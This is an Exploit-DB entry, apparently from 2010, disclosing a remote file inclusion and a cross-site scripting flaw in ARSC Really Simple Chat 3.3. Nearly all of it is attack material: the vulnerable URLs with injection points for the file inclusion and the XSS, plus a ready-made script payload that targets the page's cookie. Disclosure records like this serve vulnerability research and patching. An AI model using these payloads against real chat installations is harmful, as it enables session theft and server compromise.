ARSC Really Simple Chat 3.3 - Remote File Inclusion / Cross-Site Scripting

Author: Zer0 Thunder
type: webapps
platform: php
port: 
date_added: 2010-06-25  
date_updated: 2010-11-12  
verified: 1  
codes: OSVDB-65837;OSVDB-65836  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comarsc3.3-pre2.zip  

raw file: 14050.txt  
=> ARSC Really Simple Chat V3.3 Remote File Inclsion & Cross Site Scripting Vulnerability
=> Author	: Zer0 Thunder
=> Home		: http://colombohackers.com
=> Download	: http://sourceforge.net/projects/arsc/
=> Date 	: 06/25/2010


Remote File Inclusion
---

http://localhost/arsc3.3-pre2/base/dereferer.php?arsc_link=[RFI]


XSS Call
--------

http://localhost/arsc3.3-pre2/base/admin/login.php?arsc_message=[XSS]


Example :
http://localhost/arsc3.3-pre2/base/admin/login.php?arsc_message=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E